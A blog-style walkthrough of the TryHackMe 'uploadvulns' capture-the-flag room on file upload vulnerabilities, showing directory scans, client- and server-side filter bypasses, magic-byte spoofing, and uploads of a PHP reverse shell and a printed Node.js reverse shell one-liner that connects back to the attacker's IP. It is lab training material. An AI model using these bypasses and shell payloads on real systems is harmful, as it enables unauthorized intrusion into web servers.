Tryhackme room ⇒ https://tryhackme.com/room/uploadvulns
Hello!!

Task 1⇒ Getting Started

Deploy the machine.

copy-paste the command given in the task to your terminal and press enter.

Command⇒ echo "<Machine_Ip> overwrite.uploadvulns.thm shell.uploadvulns.thm java.uploadvulns.thm annex.uploadvulns.thm magic.uploadvulns.thm jewel.uploadvulns.thm" | sudo tee -a /etc/hosts

This is an abnormal step for a TryHackMe machine, but must be completed to access the practical content of this room.

When you get finished with the room, make sure you revert the host file to normal by running this command⇒

Command⇒ sudo sed -i '$d' /etc/hosts

Task 2⇒ Introduction

Just Go through their introduction part and make sure you know ⇒

Gobuster
Reverse and blind shell knowledge
Burpsuite

Let’s begin!

Task 3⇒ General Methodology

I won’t copy-paste those paras here.

Just letting you know the main thing

Gobuster is no longer installed by default on Kali, but can be installed with sudo apt install gobuster. Intercepting upload requests with Burpsuite will also come in handy.

Task 4⇒ Overwriting Existing Files

Read the task, so that you have a basic idea of what we are going to do.

Now, let’s put this into practice.

Open your web browser and navigate to overwrite.uploadvulns.thm. Your goal is to overwrite a file on the server with an upload of your own.

⇒Right-click on the webpage and click on “View Page source”

⇒ Here on the source code page, we see that the jpg file name is given which is the answer to our First Question of this task

Check where I have underlined the code, we see that’s responsible for displaying the image that we saw on the page. It’s being sourced from a file called “spaniel.jpg”, inside a directory called “images”.

Now we know where the image is being pulled from – can we overwrite it?

Let’s download another image from the internet and call it mountains.jpg. We’ll then upload it to the site and see if we can overwrite the existing image:

Now upload the image we downloaded and named mountains.jpg ⇒

Click on select file > select the mountains.jpg image that we downloaded > Click on upload Button

Boom!! Well done – you overwrote the file!
Your flag is: THM{OTBiODQ3YmNjYWZhM2UyMmYzZDNiZjI5}

Task 5⇒ Remote Code Execution

Read the task, so that you have a basic idea of what we are going to do.

Now, let’s put this into practice.

Open your web browser and navigate to shell.uploadvulns.thm.

Here, if you check for the source code of the website, You won’t find the image source- which means where images or files are stored on the webpage.

Here comes hidden Directories.

We can start a directory scan through gobuster to check if there are any hidden directories.

⇒ gobuster dir -u [http://shell.uploadvulns.thm](http://shell.uploadvulns.thm/)-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

dir — For specifying the directory scan

-u — For specifying the URL of the website to be scanned

-w — For specifying the Wordlist to be used.

┌──(illucist㉿kali)-[~]
└─$ gobuster dir -u [http://shell.uploadvulns.thm](http://shell.uploadvulns.thm/) --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

[+] Url: [http://shell.uploadvulns.thm](http://shell.uploadvulns.thm/)
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s

2021/06/08 15:42:41 Starting gobuster in directory enumeration mode

/resources            (Status: 301) [Size: 334] [--> [http://shell.uploadvulns.thm/resources/](http://shell.uploadvulns.thm/resources/)]
/assets               (Status: 301) [Size: 331] [--> [http://shell.uploadvulns.thm/assets/](http://shell.uploadvulns.thm/assets/)]

Here we found two hidden directories, but still, we don’t know where the uploaded files will be stored, so let’s try uploading a random image to check.

Do as same as you uploaded mountain.jpg in the previous task.

and head to the http://shell.uploadvulns.thm/resources/ to check if the moutain.jpg is there or not.

So, now we know that our files are stored in the /resources directory.

Let’s get prepared for uploading our malicious payload for RCE.

Get either a web shell or a reverse shell on the machine.

What’s the flag in the /var/www/ directory of the server?

⇒ I m a lover of reverse shells, So if you want to learn about web shell-read the task again

So let’s get the reverse shell code that is to be uploaded to the website

If you not using kali, Copy the code from https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php and paste it into the new file called shell.php

Php reverse shell already comes with kali.

So write the following command,

cp /usr/share/webshells/php/php-reverse-shell.php ~/Downloads/shell.php

cp– for copying the PHP reverse shell to the Downloads folder in the shell.php file

move to the downloads directory through the command cd Downloads/

and open the shell.php file through nano shell.php

Here you should the following code by scrolling down⇒

set_time_limit (0); $VERSION = "1.0"; **$ip = '10.14.11.58'; // CHANGE THIS $port = 4444; // CHANGE THIS** $chunk_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a; w; id; /bin/sh -i'; $daemon = 0; $debug = 0;

Change the IP to your tun0ip and port to 4444

press ctrl+x and save the file

Now start a Netcat listener on your kali machine by running the following command⇒

nc -lvnp 4444

Now upload the shell.php file on the webpage and go to the resource directory like before

Go to the resources directory again and there you will see our reverse shell file as shown in the ss.

Now, on clicking the shell.php file on that webpage, the reverse shell will be activated and moving to our Linux terminal we can see that we got a connection as showed in the screenshot below⇒

whoo hoo!!!! we got the shell.

Now in the task question, we were told that the flag is in the /var/www directory so let’s jump into it by changing the directory ⇒ cd /var/www

now passing the ls command we will see the flag.txt file

extract its content through the command cat flag.txt

yeah, How you feeling little heckur sir?
Giphy - hacker GIF

Task 6⇒ Filtering

Go through the task, read everything.

Answers

Q1. What is the traditionally predominant server-side scripting language?

⇒ PHP

Q2. When validating by file extension, what would you call a list of accepted extensions (whereby the server rejects any extension not in the list)?

⇒ Whitelist

Q3. [Research] What MIME type would you expect to see when uploading a CSV file?

⇒ text/csv

Task 7⇒ Bypassing Client-Side Filtering

Every time Very first step should be going through the details and information given in the task itself.

moving on to the exercise, we need to bypass the Client-side upload filter.

Let’s give it a shot. Navigate to http://java.uploadvulns.thm/

Tryhackme has shown us 2 methods to bypass the client-side filtering,

bypassing the filter by intercepting and removing it before the page being loaded
by uploading a file with a legitimate extension and MIME type, then intercepting and correcting the upload with Burpsuite.

Here I will be using the second method told by tryhackme.

What are we gonna do ?

⇒We will first check the source code to confirm what extensions doest the following website allows. Then we will be taking the reverse shell that we used before and rename it to be called “shell.png”. As the MIME type (based on the file extension) automatically checks out, the Client-Side filter lets our payload through without complaining:

If you wanna learn about MIME type, here is the link

https://developer.mozilla.org/en-US/docs/Web/HTTP/Basics_of_HTTP/MIME_types

Let’s get started!!

Right-click on the webpage and check the source code, You shall see the following line ⇒ <script src="assets/js/client-side-filter.js"></script> click on it, and you will be redirected to the following source code.

Here you get to know that if the developer has used ≠ for the file type to show an error if the file does not equal to image/png. So now we know what extension do we need to provide to our reverse shell file.

Take the same reverse shell file i.e ‘shell.php’ and rename it to ‘shell.png’.

open burp suite and turn on the interceptor in the proxy tab.

now, go back to the webpage and upload the shell.png file.

Now when you click on the upload button, Your web request will be redirected to burp suite.

Head toward the burp suite under the Raw tab in the Proxy tab, There you will see your web request.

Observe that the MIME type of our PHP shell is currently image/png. We’ll change this to text/x-php, and the file extension from .png to .php, then forward the request to the server:

Now, We’ll change the MIME type to text/x-php, and the file extension from .png to .php.

Now, click forward until the request is sent to the server, and boom on checking the webpage, your shell.png file is uploaded on the webpage.

We should have done this before but never mind, let’s do it now.

Run a gobuster scan to check the hidden directories where your uploaded files are stored

┌──(illucist㉿kali)-[~]
└─$ gobuster dir -u [http://java.uploadvulns.thm](http://java.uploadvulns.thm/) --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

[+] Url: [http://java.uploadvulns.thm](http://java.uploadvulns.thm/)
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s

2021/06/09 10:59:57 Starting gobuster in directory enumeration mode

/images               (Status: 301) [Size: 329] [--> [http://java.uploadvulns.thm/images/](http://java.uploadvulns.thm/images/)]
/assets               (Status: 301) [Size: 329] [--> [http://java.uploadvulns.thm/assets/](http://java.uploadvulns.thm/assets/)]

Here we found /image directory.

So, Now let’s Open the /image directory by heading to the link http://java.uploadvulns.thm/images/.

Here we found our shell.php file.

Now you know what we have to do as we did in task5.

Run the Netcat listener on the Linux terminal through the command

⇒ nc -lvnp 4444

Go back to the images directory and click on php file to activate our reverse shell.

hello heckur, you got the shell, right? Get the flag my friend.

Now in the task question, we were told that the flag is in the /var/www directory so let’s jump into it by changing the directory⇒ cd /var/www

now passing the ls command we will see the flag.txt file

extract its content through the command cat flag.txt

Task 8⇒ Bypassing Server-Side Filtering: File Extensions

Every time Very first step should be going through the details and information given in the task itself.

First, let’s enumerate the hidden directories⇒

┌──(illucist㉿kali)-[~]
└─$ gobuster dir -u [http://annex.uploadvulns.thm](http://annex.uploadvulns.thm/) --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

[+] Url: [http://annex.uploadvulns.thm](http://annex.uploadvulns.thm/)
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s

2021/06/09 12:12:00 Starting gobuster in directory enumeration mode

/privacy              (Status: 301) [Size: 332] [--> [http://annex.uploadvulns.thm/privacy/](http://annex.uploadvulns.thm/privacy/)]
/assets               (Status: 301) [Size: 331] [--> [http://annex.uploadvulns.thm/assets/](http://annex.uploadvulns.thm/assets/)]

So here we got /privacy directory for which we will look further in this task.

Now, if you read the whole task, tryhackme had tried to tell two methods

website that’s using a blacklist for file extensions as a server-side filter
completely black-box: i.e. without the source code.

Here we will solve with the help of the second method, if you doing 1st method and have doubts, you can ping me up in the discussions.

Let’s first upload a jpg file.

Type select in the command line and press enter to select an image file.

After choosing the file, type upload to upload the file.

What? our jpg file is uploaded successfully which means the website allows jpg files.

Now let’s try uploading our reverse shell i.e with php extension.

Repeat the above process to upload the file.

So, the server-side filter doesn’t allow us to upload php files.

what do we do now ??

Lets try different extensions of php, https://en.wikipedia.org/wiki/PHP

Here we get multiple file extensions of PHP⇒

.php, .phtml, .php3, .php4, .php5, .php7, .phps, .php-s, .pht, .phar

let’s try each extension with our shell.php file. and try uploading the file.

Note⇒ Please try this yourself, because I m directly coming to the eligible extension. Be Honest to yourselves.

Here After trying different file extensions, we finally came to the .php5 extension which got uploaded successfully. ⇒

Remember we found /privacy directory through Gobuster scan, let’s move in there.

Now, of course, you know what next we have to do!!

And just an unpopular thought of mine⇒ How cute is this reverse shell part!! 😉

Run the Netcat listener on the Linux terminal through the command

⇒ nc -lvnp 4444

Go back to the images directory and click on php file to activate our reverse shell.

hello heckur, you got the shell, right? Get the flag my friend.

Now in the task question, we were told that the flag is in the /var/www directory so let’s jump into it by changing the directory⇒ cd /var/www

now passing the ls command we will see the flag.txt file

extract its content through the command cat flag.txt

Task 9⇒ Bypassing Server-Side Filtering: Magic Numbers

Every time Very first step should be going through the details and information given in the task itself.

First let’s enumerate the hidden directories⇒

┌──(illucist㉿kali)-[~]
└─$ gobuster dir -u [http://magic.uploadvulns.thm](http://magic.uploadvulns.thm/) --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

[+] Url: [http://magic.uploadvulns.thm](http://magic.uploadvulns.thm/)
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s

2021/06/09 17:40:40 Starting gobuster in directory enumeration mode

/graphics             (Status: 301) [Size: 333] [--> [http://magic.uploadvulns.thm/graphics/](http://magic.uploadvulns.thm/graphics/)]
/assets               (Status: 301) [Size: 331] [--> [http://magic.uploadvulns.thm/assets/](http://magic.uploadvulns.thm/assets/)]

we got /graphics directory, we will use it later.

let’s jump to the next step.

Now let’s directly try uploading our shell.php file, lets see what the web page has to say.

Let me introduce you to the Magic Number concept first⇒ Magic Number validation: Magic numbers are the more accurate way of determining the contents of a file; although, they are by no means impossible to fake. The “magic number” of a file is a string of bytes at the very beginning of the file content which identifies the content. For example, a PNG file would have these bytes at the very top of the file: 89 50 4E 47 0D 0A 1A 0A.

Or else you can go back to Task 6 and read yourself.

So here we see we need a GIF file to upload our shell.

Let’s find the magic number of GIF file From —https://en.wikipedia.org/wiki/List_of_file_signatures

Here we have 2 magic numbers, but don’t worry we will try the first one i.e

47 49 46 38 37 61

We see that this Magic number is 6 bytes long. So we will add AAAAAA to the shell.php file, lets do this!

my Shell.php file is in the Downloads folder so I will first switch to the downloads directory and will then edit the shell.php file.

cd Downloads/

nano shell.php

Add AAAAAA at the top as shown in the screenshot provided below.

press ctrl+x, save the file, and exit.

Now, we will edit the hex of the same shell.php file. Follow me—

hexeditor shell.php

Note the 6 bytes on the red line: they are all 41, which is the hex code for a capital “A” – exactly what we added at the top of the shell.php file previously.

Change this to the magic number we found earlier for GIF files: 47 49 46 38 37 61

Press ctrl+x, save it, and exit.

Now let’s try uploading our shell.php file.

whoop!! our file is uploaded.

next step, Please tell me you are smiling inside, haha lol

let’s do this—

Run the Netcat listener on the Linux terminal through the command

⇒ nc -lvnp 4444

Go back to the website, if you try to visit the graphics directory, you won’t be able to coz Indexing is off on the server so we need to type in the following⇒

hello heckur, you got the shell, right? Get the flag my friend.

Now in the task question, we were told that the flag is in the /var/www directory so let’s jump into it by changing the directory⇒ cd /var/www

now passing the ls command we will see the flag.txt file

extract its content through the command cat flag.txt

Task 10⇒ Example methodology.

Please read it with 100% focus on its concepts.

Task 11⇒ Challenge

It’s challenge time!

Again suggesting you read Task 10 properly coz it will help much.

Let’s go!!

As usual with our built methodology we should start with Gobuster scan for getting all Hidden directories (if any).

┌──(illucist㉿kali)-[~]
└─$ gobuster dir -u [http://jewel.uploadvulns.thm](http://jewel.uploadvulns.thm/) --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

[+] Url: [http://jewel.uploadvulns.thm](http://jewel.uploadvulns.thm/)
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s

2021/06/09 23:57:19 Starting gobuster in directory enumeration mode

/content              (Status: 301) [Size: 181] [--> /content/]
/modules              (Status: 301) [Size: 181] [--> /modules/]
/admin                (Status: 200) [Size: 1238]
/assets               (Status: 301) [Size: 179] [--> /assets/]
/Content              (Status: 301) [Size: 181] [--> /Content/]
/Assets               (Status: 301) [Size: 179] [--> /Assets/]
/Modules              (Status: 301) [Size: 181] [--> /Modules/]
/Admin                (Status: 200) [Size: 1238]

Here we got many directories, will come to these later.

Let’s just move to the website and check the website’s source code.

Click on assets/js/upload.js, and then you will get to see the client-side filter.

Let’s analyze the website to know its backend programming language and get our payload for it.

Here we see that wappalyzer tells us it’s a Node.js backend.

Let’s get a Node.js payload from https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Reverse Shell Cheatsheet.md

Look for Nodejs payload and copy it,

(function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []); var client = new net.Socket(); client.connect(443, "10.14.11.58", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/; // Prevents the Node.js application form crashing })();

Copy the payload, create a file called shell.js and paste the payload into it.

Make sure you change the IP to your Tun0ip

Let’s upload our file by bypassing the client filter with the help of our great helper Burpsuite.

Switch your proxy to burp, open Burpsuite, turn the intercept on under the Proxy tab. (Make sure you uncheck the file extension option under Intercept Client Requests which is in the options tab under proxy tab)

Hard refresh the webpage,

Come back to the burp suite⇒ Now keep forwarding the request until you get to see upload.js in the GET request.

Right, click on the intercepted request > Do intercept > Response to this request.

Now, forward until you see this page

Go down and you will see the client-side filters, remove them and forward the request

Now upload the file.

It’s still not allowing us to upload which means — server-side filter, let’s try changing the name of our payload to shell.jpg and then upload the file.

and there you go, the File successfully uploaded.

Let’s now find out where our shell.jpg file went.

previously we found out some directories from gobuster scan.

Most probably the file should be in /content directory, so let’s just try running gobuster scan to find our payload. NOTE⇒ Download the task file as it is the wordlists we gonna use to find our file.

The -x flag will be used here to specifically search for jpg files

command ⇒ gobuster dir -u [http://jewel.uploadvulns.thm/content/](http://jewel.uploadvulns.thm/content/) --wordlist /home/illucist/Downloads/UploadVulnsWordlist.txt -x jpg

Result⇒

┌──(illucist㉿kali)-[~]
└─$ gobuster dir -u [http://jewel.uploadvulns.thm/content/](http://jewel.uploadvulns.thm/content/) --wordlist /home/illucist/Downloads/UploadVulnsWordlist.txt -x jpg

Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

[+] Url: [http://jewel.uploadvulns.thm/content/](http://jewel.uploadvulns.thm/content/)
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /home/illucist/Downloads/UploadVulnsWordlist.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: jpg
[+] Timeout: 10s

2021/06/10 01:52:24 Starting gobuster in directory enumeration mode

/ABH.jpg              (Status: 200) [Size: 705442]
/HQX.jpg              (Status: 200) [Size: 69276]
/JAV.jpg              (Status: 200) [Size: 626]
/LKQ.jpg              (Status: 200) [Size: 444808]
/NWO.jpg              (Status: 200) [Size: 69276]
/SAD.jpg              (Status: 200) [Size: 247159]
/UAD.jpg              (Status: 200) [Size: 342033]

===============================================================
2021/06/10 02:04:45 Finished

What do you think? which one can be our file ? that /jav.jpg ?? Let’s remember the name

But wait there’s an Admin page too, lets see what it has.

It shows that our files can be activated from the modules directory, which means we can activate our shell from here.

hahaha, You know what I m going to say.

It’s party time.

Run the Netcat listener on Linux terminal through the command

⇒ nc -lvnp 443

Go back to the admin directory and execute the following command⇒

../content/<name-of-your-shell>.jpg to activate your reverse shell.

hello heckur, you got the shell, right? Get the flag my friend.

Now in the task question, we were told that the flag is in the /var/www directory so let’s jump into it by changing the directory⇒ cd /var/www

now passing the ls command we will see the flag.txt file

extract its content through the command cat flag.txt

Wait, don’t forget to reset your host file⇒

When you get finished with the room, make sure you revert the host file to normal by running this command⇒

Command⇒ `sudo sed -i '$d' /etc/hosts`

Hope this helped you, If facing any issues, drop comments below.
Alos, Drop any tryhackme rooms suggestion you want writeup for.
Thank you.
Giphy - Sesame Street Thank You GIF by HBO Max

Task 1⇒ Getting Started

Task 2⇒ Introduction

Task 3⇒ General Methodology

Task 4⇒ Overwriting Existing Files

Task 5⇒ Remote Code Execution

Task 6⇒ Filtering

Task 7⇒ Bypassing Client-Side Filtering

Task 8⇒ Bypassing Server-Side Filtering: File Extensions

Note⇒ Please try this yourself, because I m directly coming to the eligible extension. Be Honest to yourselves.

Task 9⇒ Bypassing Server-Side Filtering: Magic Numbers

Task 10⇒ Example methodology.

Task 11⇒ Challenge

Command⇒ sudo sed -i '$d' /etc/hosts

Command⇒ `sudo sed -i '$d' /etc/hosts`

The cyber security community to share knowledge, experiences, ideas, guidance and collaborate with other cyber security enthusiasts